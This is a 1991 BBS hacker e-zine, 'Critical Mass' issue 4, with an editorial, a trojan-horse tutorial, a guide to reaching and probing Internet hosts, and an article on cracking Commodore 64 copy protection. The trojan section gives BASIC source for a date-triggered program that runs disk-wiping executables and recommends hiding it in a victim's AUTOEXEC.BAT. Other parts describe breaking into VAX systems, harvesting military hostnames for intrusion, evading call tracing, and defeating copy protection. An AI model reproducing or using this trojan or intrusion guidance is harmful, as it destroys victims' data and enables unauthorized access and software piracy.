_____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 04 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> (02/05/91) l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 4 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ _____________________________________________________________________________ l Writters l Special thanks to.... l l__________________________l________________________________________________l l l l l The Beaver l Old members of C.C.C, SF, Copy Cat, etc. l l Shadow l Also, Abigail, The Nut-Kracker, Robo, Mark l l ElfInMagic l , All Members Of The SAOO! l l__________________________l________________________________________________l DISCLAIMER -----------> EXPERIMENT AT YOUR OWN RISK! ---------------------------- The editor and writters of this 'techincal newsletter' will take no responiblities for injuries or procescutions due too the information in this news letter. Experiment at your own risk, because editors and writters will NOT be held responsible. ARTICLES AND QUESTIONS WANTED! ------------------------------ If you wish to submit a article to 'Critical Mass', please do! The whole newsletter depends on YOU the reader. No article is to big or to small. Normal 'non-welcome' subjects, such as, phreaking, hacking, credit card surfing, etc, etc, are welcome here!! Subject can be from 'how to rip off types of coke machines' to 'how to build a atomic bomb for spare car parts'. Also, if you have ANY questions, ideas, comments, insults, donations, theroys, hypothesis, etc, etc, please E-mail the writer of the aritcle you read OR 'The Beaver' in one of two of these fine, fine BBS's!........ The Reactor BBS -> (904)878-1736 Warriers Retreat -> (904)422-3606 /\ /\/\ Chief Editor Brought To You By /\/\/\ ~~~~~~~~~~~~~ Members of /\/\/\/\ The Beaver SAOO! /\/\/\/\/\ /\/\/\/\/\/\ /\/Critical\/\ ilicon \/\/\Mass/\/\/ luminum \/\/\/\/\/\/ xidation \/\/\/\/\/ ganization \/\/\/\/ \/\/\/ \/\/ \/ ______________________________________________________________________________ l This issue contains articles of the following..... l l____________________________________________________________________________l l l l I. Editorial written by 'The Beaver'. l l II. BASIC Host For Trojans, by 'ElfInMagic' l l III. Hacking The Internet Part One!, by 'The Beaver' l l IV. Kracking; Overveiw - Into - 'Shadow' l l____________________________________________________________________________l ______________________________________________________________________________ l Todays Topic Is....... l l Written By The Beaver l l____________________________________________________________________________l We as you may (or your REALLY stupid people) may not know, the US is at war. You may or may not have people you know fighting over there, so we here in the hacking realm decided to put our part for you. If you have friends or love ones there, you can send them mail faster than anyone you know know. While hacking on a VAX I broke into, I got a hold of a message from east Florida and it states that GE is allowing the use of there network to send messages to loves one at war. You must supply some information though. Like the following...... Name and Rank Social Security Number Unit or Ship If you don't supply this information correctly, it will be sent to the wrong person. What happens is that you send a message, it is then put into envolopes and sealed. After that it is given to the person you desire. It is a hell of alot fast than standard US mail! Just call....... (904)668-7610 ......and supply the information given. At the 'U#' prompt, just press return. If you don't like the war, please don't send out anti-war shit. Its bad enough that they have to be there without your shit. On a lighter subject, heres a little information named 'Dungeon Master' gave me, that I SHOULD have known a LONG time ago. All you wargamers out there will be happy to here that the call tracing or the redial last number features or NOT avalible for the following prefixxes and exchanges in the TLH area!!!!!!!!!! 421 488, 487 893-0000 thru 893-6999 893-9100's thru 668-12XX You don't beleive me? Look on page 11 in the white pages! Also, there are a few things that happens in call tracing, you must understand. When a call is sucessfully traced, the fone company doesn't give the number to you but rather the law enforcement agency handles the task for you. On another subject, in Critical Mass#2, I talk about hacking InterAct. All that information should be disregarded. The system was taken down. You didn't miss much. It was running on a IBM3090 series. Included with this text is some code that is (or should I say was) 'confidental'. It is 'C' code and I figured some of you may be intrested to see exactly how UNIX works. This is part of the inner making. Download if you please and have intrest. It is under the name 'Criticalinfo.txt'. I won't tell what system it came from! Have fun and happy hacking to ya! ____________________________________ I I I Using Basic in Trojan Horses 1 I I I I By: ElfInMagic I I__________________________________I This is the premier of a new section in Critical Mass called "Using Basic in Trojan Horses"... I will basically will be giving you some basic source code, and explaining how it works... Well let's get started with a simple little program that will destroy whatever disk it is located on if the date is equal or later than the one you specified. 10 CLS 20 CLOSE #1:CLOSE #2 30 KEY OFF 40 MONTH$=LEFT$(DATE$,2) 'This gets the current Month 50 DAY$=MID$(DATE$,4,2) 'This gets the current Date 60 YEAR$=RIGHT$(DATE$,2) 'This gets the current Year 70 MONTH=VAL(MONTH$) 'This changes Month$ to Month 80 DAY=VAL(DAY$) 'This changes Day$ to Day 90 YEAR = VAL(YEAR$) 'This changes Year$ to Year 100 NEWDATE$="01/01/92" 'You change this to any date you ' want to ... 110 NEWMONTH$=LEFT$(NEWDATE$,2) 'Gets the Month to check 120 NEWDAY$=MID$(NEWDATE$,4,2) 'Gets the Day to check 130 NEWYEAR$=RIGHT$(NEWDATE$,2) 'Gets the year to check 140 NEWMONTH=VAL(NEWMONTH$) 'Changes NewMonth$ to NewMonth 150 NEWDAY=VAL(NEWDAY$) 'Changes NewDay$ to NewDay 160 NEWYEAR=VAL(NEWYEAR$) ' Changes NewYear$ to NewYear 170 IF MONTH >NEWMONTH AND YEAR >=NEWYEAR THEN GOTO 210 180 IF MONTH = NEWMONTH AND DAY=>NEWDAY AND YEAR = NEWYEAR THEN GOTO 210 190 IF YEAR > NEWYEAR THEN GOTO 210 200 END 210 SHELL "CD >FAKE.DAT" 'Places current sub directory in a 'file 220 OPEN "FAKE.DAT" FOR INPUT AS #1 'Opens file for use 230 LINE INPUT #1, DRIVE$ 'Gets then Directory you are in 240 DRIVE$=LEFT$(DRIVE$,2) 'Finds the Drive currently on 250 IF DRIVE$=UCASE$(DRIVE$) 260 IF DRIVE$="A:" THEN SHELL"REN X001.BIN KILLA.COM": SHELL"KILLA.COM" 270 IF DRIVE$="B:" THEN SHELL REN X002.BIN KILLB.COM": SHELL"KILLB.COM" 280 IF DRIVE$="C:" THEN SHELL REN X003.BIN KILLC.COM": SHELL"KILLC.COM" 290 IF DRIVE$="D:" THEN SHELL REN X004.BIN KILLD.COM": SHELL"KILLD.COM" 300 IF DRIVE$="E:" THEN SHELL REN X005.BIN KILLE.COM": SHELL"KILLE.COM" 310 END Basically all this piece of code does is it will check the current date of the system, and if the date is after or on the date you specify, it will destroy whichever drive it is being run from... So you could add this to someone's "AutoExec.Bat" file, and when the date matches or is after the one you specify, it will destroy the drive it is being run from... For this to run correctly, you must use the information in Critical Mass issue #1, and compile the ".COM" files needed to destroy each of the above disks... Then rename them to the appropriate file name... For this program to run correctly, you need to compile it, so it will run directly from DOS... If you do not have a Basic Compiler then you will need to run it with the command "Basica DateChek.Bas", and change line 310 to "SYSTEM". The next issue of this text will contain a text file with a source code on using command line attributes in basic, and how to add them to this program... _____________________________________________________________ I I I Any questions on this may be sent to "ElfInMagic" via the I I Warriors Retreat I I___________________________________________________________I Also please feel free to ask any questions on how to do something like this in Basic... If I do not know, I will be happy to find out for you... ____________________________________________ l l l Hacking Internet, Part I l l By The Beaver l l__________________________________________l This is the first of a series of articles that will pretain to the hacking of 'Internet'. Yes, this is the same network that a worm hit in 1987. Actually, this artical will talk more along the lines of hacking the Telnet systems, which in turn, you can get to other networks like ARPAnet and CHAOSnet, and much more. First off, I would like to go into finding a Telnet you can use. On VAX's under VMS, there is usually a service called 'TELNET'. This is you gateway to the internet and other networks. Usually, these networks go to everything from White Sands Missle Range to Small colleges. Sense most Telnet gateways are only accessable off VAX's (or at least around here) Ok, first off, lets say you have a access to the Telnet gateway, it does you no good if you have nowhere to goto! If you ask for help most of the time, you will get very little. First, I have noted two different Telnet access software types. One looks like this (Off of only VAX's that I have seen so far.....) TELNET> The Other...... Telnet> I know, this appears to be no big deal, but the first on operates a little different (The one on VAX's). For one this, the help menu is a hell of alot better and more detailed. The secound, I have only seen off of networks, and not in VAX's. Besides the help differences, they operate a little different two. You see, to connect to another computer though telnet, you must give it a address. On a VAX (the first one), you would simply type the address itself..... For example, the address is 'I.LOVE.TO.HACK'. You would do this... TELNET> I.LOVE.TO.HACK Trying....... (This is a message telling you it is attempting to connect to the remote system) On the other it would be..... Telnet> o I.LOVE.TO.HACK The 'o' stands for 'open' a address. Simple enough, lets move on. Now the information I have given you does you no good so far, if you have no addresses. Heres how to get TONS of address........ We will use the telnet though a VAX to make it simple (just keep in mind what I said above). The address is 'NIC.DDN.MIL'. The 'DDN' stands for Defense Dept. Network, and the 'MIL'. Sure you can guess. Don't worry, this system is non-classified and can be accessed 'anonymously', meaning in this case, no password or username is required. The system is running on a DEC2060 on TOPS-20, for you more experianced hackers out there..... So you would type...... TELNET>NIC.DDN.MIL Trying........ Connected to (Blah, blah, blah) You will then be connected to the system in Washington, I beieve, Im not sure. On this system, you can read bulletins about security on the internet, and often get a few pointers on hacking! (This would be the first option on the menu, or 'NIC'. Lets go on though with the article though. Do read it though. It is VERY intresting at times. Now you have one address. With this address you can get tons but typing this at the '@' prompt. WHOIS (What ever you what to get a address to, for example) WHOIS WHITE When you type this though, you have to wait a LLOOONNGG time for it to put up all things about 'white'. It will not only pull up addresses, but in many cases, network uses also! Names, fone numbers and all! One of the first thing it will pull is 'White sands missle range' the last thing it will get is a 'Wyoma E. Smith', or a netuser. Some users work form the pentagon, other Eglins Air Force Base. Now most of these systems are non- classified, but from what I understand, it is possible to find classifed systems also. The odds that you could break into a classified, or even find one is about null. Now after 5 to 10 min of searching its database, it will give a BIG list (Im not kidding about the time). Here is a example line....... U.S Air Force (APDS-II-OSO33) APDS-II-OSO33.AF.MIL 26.6.0.66 ^ ^ ^ ^ l l l l Name Handle Address Address (Usually Internet) 1. 2. 3. 4. Worry only about the name and addresses, for now. Now this is a good example, but most of the time it is a little easier to read that this. After we got all the addresses we wanted, we would then leave NIC.DDN.MIL by typing 'quit'. From there we would goto the 'TELNET>' prompt again. Now lets say we want to connect the system above, we would try to determine what the addresses is. No at number 3, note the '-' in the name. These will not work on internet. So we look at the last dash and copy everything too the right, or 'OSO33.AF.MIL'. Odds are this address will work fine at the telnet prompt. So to connect to this system, you would type....... TELNET>OSO33.AF.MIL Trying....... Now one of few things might happen. You might get 'Trying.....Unable To Connect To Remote Host In Time Out Period', or something like that. This is not bad, try is again a few times. If it doesn't connect, either the system is down, the line is bad, or just wants no one from your area to connect to that system, which I doubt ever happens. Just try again at a later time. If it says 'Internet host unknown', we go back up too the example above. Look at number 4. Try that at the telnet. If you get the same you might have trouble accessing that system. You type that in just as it appears. Most of the addresses I and Shadow have found connect to SUN's. They seem to like them a bunch. This should cover the basics of hacking internet. For you people that use 'internet' on a VAX, there is sometimes a 'anonymous' list for internet. It will give you addresses to systems that you can connect to and type at the username prompt 'guest' and the password 'anonymous', usually. GET IT! It is VERY handy! Also, Another way to get addresses off a VAX without going though TELNET, is at your VMS prompt, type 'whois (ya no what goes here)'. If it has telnet abilities, you will get a list. This doesn't work from a network telnet, only on VAX telnet's. Now I am going to tell you something that some hackers in TLH area might not like (mostly my brothers in the SAOO). Heres how YOU can access telnet and hack on it. No password or username is required. I take it will all know how to use FIRN and UFnet (refer to CM#1 and 2). Do this at the UFnet '#' prompt. Type either call 200 or call 202 Which every you prefer. Now connect to 'ds2100', like thus..... Local> c ds2100 ==--- Due to the loss of the original artical, I will now re-type it (to the best of my non-static memory). The good part is that now I can add a second part to the artical covering the basics of using a sector and format editor. The machine of choice is a Commodore 64. This artical makes no attempt to present it's self as a full and complete guide to cracking, I will, however, give you the title of a book that makes a great refrence work. The title: Inside Commodore DOS The authors: Richard Immers, Ph.D. and Gerald G. Newfeld, Ph.D. If you own a 1541 and not this book; buy the book! It's a real help! To those who want to review the useages of sector and format editors, procide to appendix A (an overview), B (sector editors) and C (format editors) If you have any questions about this or other cracking techniques, I may be contacted at Warrior's Retreat (P#:(904)422-3606 username: Shadow) or through The Beaver. About the spelling, I know and don't CARE!!! The techniques discribed here are for use with a Commodore 64, but should hold true with any machine. The techinics discribed here should hold true with any machine . - Shadow Copy protection: Their are three popular methods of copy protection. One, embeded errors; two, data encription; and three, manual protection. The first two methods are somewhat simple to overcome, the third however, does present problems. We will cover these methods one at a time and in order. However, first their are definitions to be made: One, Embeded Errors: This one is the easiest to defeat, all one has to do is come up with a comptent nibler (bit copier) and cut it loose. This should make a functional copy. The method behind the madness of loading down a disk with errors is that earlier in the strugle between pirates and developers, the developers belived that pirates would not be able to easly copy these errors and become discuraged. The pirates rose to the ocation and came up with the bit coping system. They also came up with the idea of paramaters for these bit copiers. A parementer is a map of errors that a nibbler uses when it copies a disk. Two, Data Encription: This one also has advantages and was the next step in the battle. It uses such techniques as half-tracks, checksums, and encodeing. It is at it's best when coupled with manual protection, otherwise it has little valule. Three, Manual protection: This one ranges from hard to easy and all points between. Manual protection's ease of overcome is directly realted to either if it is coupled with data encription or it's actual position on the disk. I'll explain. If the data base the program uses for valadation is part of the same program that actualy does the vadalation then the job is much easier. (See below for reasons) Steps to cracking preperation: First: Scan the disk for errors. If errors are there, make a nibble copy and run the copy. Make sure that it behaves exactly like the original. If it doesn't then go back and figure out why. This may be done by making an error map of the original and comparing it to the errors present on the copy. If they are the same, then you have a valid copy. With this copy, the sysem should work. Keep in mind, if your equipment can run this softwear then your system can duplicate it. If your system can read the stuff, then it can WRITE it! If their are no errors, STILL make a nibble copy! Better safe than sorry. Second: Establish the order of execution of the programs within the softwear and see if you can figure out just how the softwear is protected. A good rule of thumb here is: If your drive does a lot of thrashing and head banging then it is most likely error protected. If the system is manual protected, then this will be quite apparent. It'll ask for mabey a number on a wheel or some symbols or "What-is- on-line-xx-of-page-xx?"... Third: Overcoming softwear protection is DIRECTLY related to the method of protection used. Not only this, but just how the method(s) are interelated. An example: A peice of softwear might be error protected AND manual protected WHERE the keywords are ENCODED!! Needless to say, this configuration would suck to the extreme. Now for the good stuff... Cracking the wearz: Protection Method of defeat ==================== ======================================== Error protection A good solid nibble copier Encription Also a good nibbler Manual protection Now it gets tricky... Straight manual protection: In manual protection you must search for a keyword. This would be a responce that you know to be one of the answers to the verification prompts. If you have no search function, you will have to chain thru all the programs, in the order that they are loaded, until you find the table of keywords. When you find the words used, you change them all to a single word or character string (such as dec 13 (hex 0C) for return) and try it. If it doesn't work, this could mean that it has a checksum. A checksum is a number that is the sum of all the characters added. If this number doesn't check out with the data present... CRASH! To overcome a checksum one can do one of two things. First, find an entreable character or string of characters that add up to the checksum or change the checksum to your preference. The first is the easiest. Encoded manual protection: One must keep in mind that the keywords MUST be entreable from the keyboard. If it wern't then the prot. scheme would not be feasable. the entrable keys fall between asc 32 and asc 128. Then the fun begins. You must determin the method of encription (ie. crack the code). This is the next to the most dificult thing to do. Last ditch effort: If you can't undermine the copy protection scheme in any of the above indirect methods, their is one last thing that can be done. This is to load the system, disassimble it, and redirect the program around the security check aeras. This is THE *MOST* dificult method, but it is the best and absulitly sure to work if you can do it. In closing, I hope that you find this useful. If there are any questions, comments, complaints or mistakes feel free to contact me. As above, I may be E-Mailed at The Warriors Retreat (904)422-3606, Username: Shadow. Thanks and Happy Cracking. - Shadow Author's Note: In the intrest of hacking everywhere, I hereby place my self in the "Roll Call". The following is information for that use. I urge you to do the same if you are a hacker. We GOTTA orginize! Handle: Shadow Location: Warrior's Retreat Machine of preference: Amiga, Commodore 64, IBM, Apple, Color Computer (And VAX when I'm Lucky...) Group: Silicon Aluminum Oxidation Orginization Associates: The Beaver & Abigail Experence: Network hacking ; 4 months Cracking and hacking in general ; 7 years Programming: 7 Years (Languages: Basic, RPG [Ugghh!], C) <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Appendix A: An overview (Of disk Operation) A disk works like a tape recorder. In fact, a disk is made of the same materal. The bonous, ofcorce, is speed of access. Sence the sucker spins (usualy at about 300rpm [5.25" Floppy] and the read/write head moves it can locate and read information quickly and effecniently. Now, the disk structure is made up of tracks and sectors. A track is a circular band that streches around the disk's surface. Sectors are small segments that make up tracks. Now if you look at a disk, you can't tracks or sectors. This is beacuse that these structures are made up of microscopic magnetic filiments. The orentation of their poles denote whether the bit that it represents is 1 or 0 (that is on or off). Note on double sided drives: A double sided drive is much like a single sided one. The difrence is ofcorse the manor in whitch it accesses the drive. A double sided drive has two read/write heads one above eachother. It both sides of the disk at the same time. Observe: Single sided drive: Read/Write head / |||||------=== ---------------------- <- Disk Double sided drive: Read/Write head / |||||------=== ---------------------- <- Disk |||||------=== \ Read/Write head This (for a double sided drive) means that their is a a new structure: The cylender. A cyndler is a set of tracks that occur one above eachother. This allows both more disk space and faser access. Now, their is only one thing that remains. As a rule, a disk will write data to sectors that are about 10 sectors distant. This is done for speed. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Appendix B: Sector Editors Basicly all sector editors will read a sector as a chunk of data, and allow you to edit it. Mostly they will allow editing in either HEX or DEC format. After editing, it will allow you to write it back to the disk When you get your sector editor, you should practice with it on a test disk. The reason is that a sector editor bypasses all safty functions within a drive's operating system, and you could wipe out a program's data. When possible, it is best to get a sector editor with capabilities to generate errors. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Appendix C: Format Editors A format editor is a system whitch can generate errors for a full track. They are also cabeable of changeing critical header information and disk checksums. Best to find one that is intergrated with a sector editor and possibly a copy system. I use (for my C64) either Di-sector3.0 or Renegade2.0 These are good solid systems. If you have a better version of either of these systems for a Commodore 64, please tell me. End of File. _____________________________________________ l l l Letters and Replies l l___________________________________________l *NOTE: All letters sent to 'Critical Mass' writter's and editors are posted here anynomous like, unless you tell us other wise. Please, ask any question that comes to mind. No question is to small or large! From: XXXXXXXXXXXXXXXXX Subject: GRIND 2.0 The Beaver, I must say that the people for whom I speak will never be the same... What happened to Grind 2.0! Alas have you forgotten the mighty few who have fought long and hard to keep such a valiant hobby alive... We the few the proud shall regret the day that you hath taken such a powerful and mighty tool from us... By the way... U-load the other Hack software you have to here... I know this letter sounds like it is from the 11th century, but is it funny or what! XXXXXXXXXXX Well, GRIND 2.0 (or The IBM Home Destruction Kit) is moving right along. It is a VERY large task, so it is going to take longer than I had really planed on! Actually, there will be no IBM.H.D.K, but rather 'The Advanced Hacker ToolBox'. It is the merge of two programs. They are 'The SC/HA Hacker ToolBox' and 'The IBM Home Destruction Kit'. Here is a few things it will included when done.......... 1> Terminal 2> ASCII Capture and Xmodem Tranfering 3> Long Distance Carrier Code Finder!!!! 4> Rapid Fire (Command and buff overloading, for those OLD systems) 5> Key scan (For those systems that don't respond to anything) 6> Dbase Hacker (With 470+ popular passwords!) 7> Online Trojan Kit!!!!!! 8> WarGame Dialer 9> And about a million other things! So just keep you eyes peeled, you will see it soon, I hope. With many more versions to come too! ______________________________ l l l Finnal Notes l l____________________________l Ahhhhh, well onec again, it appears that we have come to the close of yet another issue of Critical Mass. I have been amazed at the response that I have gotten from Tallahassee area hackers and there support. Thanks a bunch! Still, I do get the usual insult, and I even had one guy tell me not to write another CM issue, or I would pay. Well heres to you IN YOUR FACE! Please though keep the insults comming, it makes BBSing a little more intresting! Special Thanks Again To -> Kool Kat (Welcome to the SAOO!), Abigail, Sector 4, Dugeon Master, Red Baron, Shadow, Zap, ElfInMagic, Artful, Quizinor, all members of The New SAOO! May our hacks be big ones! No Thanks To -> The NFSA, The Kaser Klan, but only if my sources are true! No need to mention more! ( The No Thanks Is NOT a hit list, but the editors opinon! ) Also, members of the SAOO are always screening new members. If you would like to become a member, supply your REAL name, fone number, so a back ground check can be done, and a vote can take place. Don't bother if you will not supply this information. We do VERY strict proceedures in back ground checks. A face to face is sometimes. If you find this text file, offense, mean, threating, insulting, etc, do use all a favor. Don't download it! Chow! ---====--- Editor and Head of The SAOO!